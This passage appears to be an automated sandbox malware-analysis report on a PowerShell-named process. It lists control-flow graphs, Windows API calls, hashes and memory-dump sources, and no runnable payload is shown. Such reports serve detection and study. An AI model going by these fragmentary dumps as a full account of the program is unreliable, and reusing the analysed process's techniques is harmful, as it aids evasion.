242878c1197 15553->15554 15555 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15554->15555 15556 242878c11a5 15555->15556 15557 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15556->15557 15558 242878c11b3 15557->15558 15559 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15558->15559 15560 242878c11c1 15559->15560 15561 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15560->15561 15562 242878c11d0 15561->15562 15563 242878bb978 __free_lconv_mon 4 API calls 15562->15563 15564 242878c11dc 15563->15564 15565 242878bb978 __free_lconv_mon 4 API calls 15564->15565 15566 242878c11e8 15565->15566 15567 242878bb978 __free_lconv_mon 4 API calls 15566->15567 15568 242878c11f4 15567->15568 15569 242878bb978 __free_lconv_mon 4 API calls 15568->15569 15569->15535 15571 242878c10f8 15570->15571 15573 242878c10e4 15570->15573 15571->15539 15572 242878bb978 __free_lconv_mon 4 API calls 15572->15573 15573->15571 15573->15572 15574 242878829a0 15575 242878829ce 15574->15575 15576 24287882a2c VirtualAlloc 15575->15576 15577 24287882a50 15575->15577 15576->15577 15578 242878bdb28 15579 242878bdb38 15578->15579 15586 242878bfc4c 15579->15586 15581 242878bdb41 15582 242878bdb4f 15581->15582 15594 242878bd92c GetStartupInfoW 15581->15594 15587 242878bfc6b 15586->15587 15593 242878bfc94 15586->15593 15588 242878bb8e0 _set_errno_from_matherr 4 API calls 15587->15588 15589 242878bfc70 15588->15589 15605 242878bb7c0 15589->15605 15591 242878bfc7c 15591->15581 15593->15591 15608 242878bfb54 15593->15608 15595 242878bd961 15594->15595 15596 242878bd9fb 15594->15596 15595->15596 15597 242878bfc4c 5 API calls 15595->15597 15600 242878bda1c 15596->15600 15598 242878bd98a 15597->15598 15598->15596 15599 242878bd9b4 GetFileType 15598->15599 15599->15598 15602 242878bda3a 15600->15602 15601 242878bdb0d 15601->15582 15602->15601 15603 242878bda95 GetStdHandle 15602->15603 15603->15602 15604 242878bdaa8 GetFileType 15603->15604 15604->15602 15615 242878bb710 15605->15615 15607 242878bb7d9 15607->15591 15609 242878bb900 _set_errno_from_matherr 4 API calls 15608->15609 15613 242878bfb75 15609->15613 15610 242878bfbd7 15611 242878bb978 __free_lconv_mon 4 API calls 15610->15611 15612 242878bfbe1 15611->15612 15612->15593 15613->15610 15621 242878bd6fc 15613->15621 15616 242878bb444 _set_errno_from_matherr 4 API calls 15615->15616 15617 242878bb735 15616->15617 15618 242878bb746 15617->15618 15619 242878bb710 _invalid_parameter_noinfo 4 API calls 15617->15619 15618->15607 15620 242878bb7d9 15619->15620 15620->15607 15622 242878bd36c try_get_function 3 API calls 15621->15622 15623 242878bd732 15622->15623 15624 242878bd747 InitializeCriticalSectionAndSpinCount 15623->15624 15625 242878bd73c 15623->15625 15624->15625 15625->15613 15626 242878bb978 15627 242878bb97d HeapFree 15626->15627 15628 242878bb9af 15626->15628 15627->15628 15629 242878bb998 15627->15629 15630 242878bb8e0 _set_errno_from_matherr 3 API calls 15629->15630 15630->15628

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3000768030-0
                                                                                                                      • Opcode ID: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                                      • Instruction ID: acb24ff799d9dac9ab70fd4ba2f8cd6780d5d0831aac91d3c5cf904bbf7fbd3c
                                                                                                                      • Opcode Fuzzy Hash: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
                                                                                                                      • Instruction Fuzzy Hash: 9131872261CF49E2E7648B179D9826C7A50F385BB0FA82709FB6A473E0CB34D455E760
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 20 7ffd9bab3ff5-7ffd9bab405d 25 7ffd9bab405f-7ffd9bab408e 20->25 29 7ffd9bab408f-7ffd9bab4091 25->29 29->25 30 7ffd9bab4093-7ffd9bab40b0 29->30 33 7ffd9bab4127-7ffd9bab4129 30->33 34 7ffd9bab40b2-7ffd9bab40c1 30->34 35 7ffd9bab412b-7ffd9bab41ff 33->35 36 7ffd9bab4114-7ffd9bab4124 33->36 34->29 40 7ffd9bab40c3-7ffd9bab40e0 34->40 42 7ffd9bab4217-7ffd9bab421e 35->42 43 7ffd9bab4201-7ffd9bab4215 35->43 36->33 50 7ffd9bab40e2-7ffd9bab40f9 40->50 46 7ffd9bab4220-7ffd9bab4223 42->46 47 7ffd9bab4231-7ffd9bab4258 42->47 43->42 46->47 49 7ffd9bab4225-7ffd9bab422f 46->49 53 7ffd9bab42cb-7ffd9bab42d2 47->53 54 7ffd9bab425a-7ffd9bab4265 47->54 49->47 60 7ffd9bab40fb-7ffd9bab410e 50->60 58 7ffd9bab42ea-7ffd9bab4310 53->58 59 7ffd9bab42d4-7ffd9bab42e8 53->59 54->53 57 7ffd9bab4267-7ffd9bab427f 54->57 61 7ffd9bab42c5-7ffd9bab42c9 57->61 62 7ffd9bab4281-7ffd9bab42b7 57->62 67 7ffd9bab4316-7ffd9bab437f 58->67 68 7ffd9bab43bb-7ffd9bab43ec 58->68 59->58 60->36 61->53 61->57 74 7ffd9bab433c-7ffd9bab433f 62->74 75 7ffd9bab42bd-7ffd9bab42c1 62->75 81 7ffd9bab4381-7ffd9bab438d call 7ffd9bab44bc 67->81 82 7ffd9bab4392-7ffd9bab43b5 call 7ffd9bab44bc 67->82 83 7ffd9bab443b-7ffd9bab4444 68->83 84 7ffd9bab43ee-7ffd9bab4407 68->84 76 7ffd9bab434c-7ffd9bab4359 74->76 77 7ffd9bab4341-7ffd9bab4345 74->77 75->61 77->76 90 7ffd9bab44ad-7ffd9bab44bb 81->90 82->67 82->68 91 7ffd9bab444b-7ffd9bab4487 83->91 92 7ffd9bab440a-7ffd9bab443a 84->92 97 7ffd9bab4497-7ffd9bab44a8 call 7ffd9bab4514 91->97 98 7ffd9bab4489-7ffd9bab4495 call 7ffd9bab4514 91->98 92->83 97->92 98->90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: _[_H
                                                                                                                      • API String ID: 0-2548533632
                                                                                                                      • Opcode ID: 7104ec7ebfa3e55d1329a9a186cf73294cb90d94bb4e6a53101bf7e76dcb2431
                                                                                                                      • Instruction ID: d214b61d3a71e2751346a1c9970142bccf1a4171393b9479f5cbbdb055a25618
                                                                                                                      • Opcode Fuzzy Hash: 7104ec7ebfa3e55d1329a9a186cf73294cb90d94bb4e6a53101bf7e76dcb2431
                                                                                                                      • Instruction Fuzzy Hash: C502E331B0DA9D4FEB54DB5CD465AED7BE0FF69310F0502BAD059C71A6CE64A842CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 103 242878829a0-24287882a0b call 24287880f34 * 4 112 24287882a11-24287882a14 103->112 113 24287882c23 103->113 112->113 115 24287882a1a-24287882a1d 112->115 114 24287882c25-24287882c41 113->114 115->113 116 24287882a23-24287882a26 115->116 116->113 117 24287882a2c-24287882a4a VirtualAlloc 116->117 117->113 118 24287882a50-24287882a74 call 24287880d6c 117->118 121 24287882aa3-24287882aaa 118->121 122 24287882a76-24287882aa1 call 24287880d6c 118->122 123 24287882b4a-24287882b51 121->123 124 24287882ab0-24287882abd 121->124 122->121 128 24287882c04-24287882c21 123->128 129 24287882b57-24287882b6e 123->129 124->123 126 24287882ac3-24287882ad1 124->126 136 24287882ad3-24287882add 126->136 137 24287882b35-24287882b3d 126->137 128->114 129->128 130 24287882b74 129->130 131 24287882b7a-24287882b8f 130->131 134 24287882b91-24287882ba2 131->134 135 24287882bf3-24287882bfe 131->135 139 24287882bad-24287882bb1 134->139 140 24287882ba4-24287882bab 134->140 135->128 135->131 141 24287882ae0-24287882ae4 136->141 137->126 142 24287882b3f-24287882b44 137->142 144 24287882bbc-24287882bc0 139->144 145 24287882bb3-24287882bba 139->145 143 24287882be0-24287882bf1 140->143 146 24287882b32 141->146 147 24287882ae6-24287882aea 141->147 142->123 143->134 143->135 148 24287882bd2-24287882bd6 144->148 149 24287882bc2-24287882bd0 144->149 145->143 146->137 150 24287882aec-24287882b13 147->150 151 24287882b15-24287882b1f 147->151 148->143 153 24287882bd8-24287882bdb 148->153 149->143 152 24287882b25-24287882b30 150->152 151->152 152->141 153->143
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                                      • Instruction ID: 7e7fe016f8ee541e9a8637d59e031e6b57447664a73ffc7212526a8ecc6d4f7a
                                                                                                                      • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                                      • Instruction Fuzzy Hash: FE613322702A54C7EB68CF16D85877DB391FB88BA5F848421EA1907785DB38E896D720
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4292702814-0
                                                                                                                      • Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                                      • Instruction ID: 98e063cdbc52e38a77dc94b9abb3dbcada286aff70d5b4ecfa3f933ba910b942
                                                                                                                      • Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                                      • Instruction Fuzzy Hash: FBF06D50702E0DC9FF945B739C4D39D36805BC8B88FCC4420690A977E1E92CC449A230
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 171 242878bb978-242878bb97b 172 242878bb97d-242878bb996 HeapFree 171->172 173 242878bb9b4 171->173 174 242878bb9af-242878bb9b3 172->174 175 242878bb998 call 242878bb8e0 172->175 174->173 175->174
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                                      • Instruction ID: 1a415a76282bdc8ced463fd882a728d6376ac9e19e9a47b1e314bb618ea4f4b0
                                                                                                                      • Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                                      • Instruction Fuzzy Hash: 1BD0C951A12D4DCAFAA897B36C4E37925519BD4788F844424B91981261AA1444997261
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2994360621.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bb80000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5d95420201749429e37557cbd4dd8584de37be0e89075f7eeb903aa259c68238
                                                                                                                      • Instruction ID: 47d0131ffb95c2844b83da07313208fc19a4733cdcafb15178d47b8d978a6604
                                                                                                                      • Opcode Fuzzy Hash: 5d95420201749429e37557cbd4dd8584de37be0e89075f7eeb903aa259c68238
                                                                                                                      • Instruction Fuzzy Hash: 17E1E362A0FFC90FE7A3977848355A43FE0EF56654B4A01FBD099CB1E3D918AD068351
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2994360621.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bb80000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9aca145a432aa0588b50bdd6e251f33a5e5336b562121225c592f5829653bcec
                                                                                                                      • Instruction ID: 34ce8096ecf83e69ed1cc16c1a60d265ef2edf98168068361305d802be9841f4
                                                                                                                      • Opcode Fuzzy Hash: 9aca145a432aa0588b50bdd6e251f33a5e5336b562121225c592f5829653bcec
                                                                                                                      • Instruction Fuzzy Hash: C0913622A0FE8D0FE7A6976848715B47BE0EF46694F4A01FBD09CC70E3D928AD06C351
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 309 7ffd9bab2af3-7ffd9bab2b41 318 7ffd9bab2b5c-7ffd9bab2be0 309->318 319 7ffd9bab2b43-7ffd9bab2b51 309->319 328 7ffd9bab2bf7-7ffd9bab2c06 318->328 329 7ffd9bab2be2-7ffd9bab2bf5 318->329 320 7ffd9bab2b52-7ffd9bab2b5a 319->320 320->318 320->320 332 7ffd9bab2c0d-7ffd9bab2c23 328->332 329->328
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3606a6ec8072584ebbfa3c2e5bae8713c44c69c7a7220e1ba464bd0c788fea5e
                                                                                                                      • Instruction ID: 9ae6fe134aa61cac1d1ad588b0a070dee5a146a346644a80cf54ebb57bb74430
                                                                                                                      • Opcode Fuzzy Hash: 3606a6ec8072584ebbfa3c2e5bae8713c44c69c7a7220e1ba464bd0c788fea5e
                                                                                                                      • Instruction Fuzzy Hash: B141FB22B0E7650FE765E7ACB4F15E53B90DF6523EB0801BBD499CE1E7DC0868468385
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2994360621.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bb80000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3085eeafb9e61dde4edb09c3f672a3775032717cfb9197180e9598f0638652d0
                                                                                                                      • Instruction ID: 21fa85c202020ba47bb876457444e07029bf8b3c512566941002a87b8e456449
                                                                                                                      • Opcode Fuzzy Hash: 3085eeafb9e61dde4edb09c3f672a3775032717cfb9197180e9598f0638652d0
                                                                                                                      • Instruction Fuzzy Hash: BB411622E0FE8D0FE7B5966894B52B47BD0FF45B94F8A00BAD05CC71E3D9286D058351
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 391 7ffd9bab33a5-7ffd9bab33af 392 7ffd9bab33f1-7ffd9bab3420 391->392 393 7ffd9bab33b1-7ffd9bab33c5 391->393 396 7ffd9bab3437-7ffd9bab3463 392->396 397 7ffd9bab3422-7ffd9bab342c 392->397 398 7ffd9bab342e-7ffd9bab3435 397->398 398->396
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2715c2e13effecfb1429ee149fb737ed92dc673caee9d4889d32dee4cbb7128d
                                                                                                                      • Instruction ID: cb3f4c1f11460bc1bff6b97264e34216e08284ea7978cba6295b6a78ad5c9195
                                                                                                                      • Opcode Fuzzy Hash: 2715c2e13effecfb1429ee149fb737ed92dc673caee9d4889d32dee4cbb7128d
                                                                                                                      • Instruction Fuzzy Hash: 2D110322B1EEC90FE796D33858656642BE0EF9A204B4A01FBC05CCB2A7DC08A8058341
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 402 7ffd9bab33ec-7ffd9bab3420 404 7ffd9bab3437-7ffd9bab3463 402->404 405 7ffd9bab3422-7ffd9bab3435 402->405 405->404
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 369b88a28f7c05d8c0e0abc5d6baef95ee437fc3d1cbf0d254cdd96001eb16ff
                                                                                                                      • Instruction ID: d0c360700508f62b1b98b8816c6baf43861f8afd3636b1a950a59bca23040187
                                                                                                                      • Opcode Fuzzy Hash: 369b88a28f7c05d8c0e0abc5d6baef95ee437fc3d1cbf0d254cdd96001eb16ff
                                                                                                                      • Instruction Fuzzy Hash: 53014722B2DE8E0FE798E36C54A427867D0EBA8214B4401FBD01DC72A9CC58AC024340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 410 7ffd9bab3cf9-7ffd9bab3cfb 411 7ffd9bab3d45-7ffd9bab3d67 410->411 412 7ffd9bab3cfd-7ffd9bab3d26 410->412 416 7ffd9bab3d2a-7ffd9bab3d3c 412->416 417 7ffd9bab3d41-7ffd9bab3d44 416->417 417->411
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf2751ef55c665aff01e41f41a14ea320b18bc0fc293de3ccf6fce87d8dc1143
                                                                                                                      • Instruction ID: bfc0933a42f260a83bef2ad8167715c5531943cfd50ec85bbeaadd7065d2b760
                                                                                                                      • Opcode Fuzzy Hash: bf2751ef55c665aff01e41f41a14ea320b18bc0fc293de3ccf6fce87d8dc1143
                                                                                                                      • Instruction Fuzzy Hash: 8D01D83271CA0D4FEB98DA1CE85157133D1EBE9320F10057FE44AC7296D826F9478740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 418 7ffd9bab3d68-7ffd9bab3d6d 420 7ffd9bab3d41-7ffd9bab3d67 418->420
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2992880520.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9bab0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 23dab133d60369e39cc8f2f524a89731ce62384872f4ecf44cab9d93a85f5f1c
                                                                                                                      • Instruction ID: fa4c20de2378ec7f13d0e4bd28f131df8fda48e98a36ce012c8bafa901a46184
                                                                                                                      • Opcode Fuzzy Hash: 23dab133d60369e39cc8f2f524a89731ce62384872f4ecf44cab9d93a85f5f1c
                                                                                                                      • Instruction Fuzzy Hash: 61F0A03271C6088FDB4CAA0CF8129B473D0EB99325B10016EF48BC2296E927E842CA81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                                      • Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction ID: e8fc43d282ff817fdb2e7ffed006ba8edfb5ab155a8182f3f93681aba050cadf
                                                                                                                      • Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                                      • Instruction Fuzzy Hash: 41B18E22211E99C2EB648F27DC487AD73A4FBC4B94F945016FE0953B95DB35CC89E360
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3140674995-0
                                                                                                                      • Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction ID: b2c7f5da0dfdc04dad31719fe8fa5608131db3973d0fdec6922bc5db2ac3a904
                                                                                                                      • Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction Fuzzy Hash: 6B313972205F84C6EBA08F62E8847DD7364F784744F84442AEA4E57B95DF38C5499724
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1239891234-0
                                                                                                                      • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction ID: 65c50acfdce31f57474f151be5413d3d2cbff502b09abcfa992f037cdedbf34c
                                                                                                                      • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction Fuzzy Hash: BF316D32214F84DAEB608F26EC4839E77A4F7C9758F940116FA9D43B95DF38C54A9B10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1443284424-0
                                                                                                                      • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction ID: 26ffe1bda86b0859e5fef5f50274fe9c531f28c6716193dedd5b4755879c8942
                                                                                                                      • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction Fuzzy Hash: BEE11072B15A88CAF740CF66D8882DD7BB0F3C47C8F944106EE6A57B99DA38C51AD710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                                                                                      • API String ID: 3215553584-1407779936
                                                                                                                      • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                                      • Instruction ID: 81ed1a131aad4159f9906cf65deeac8c0bc9dd2baa248632df241082d51a89b4
                                                                                                                      • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
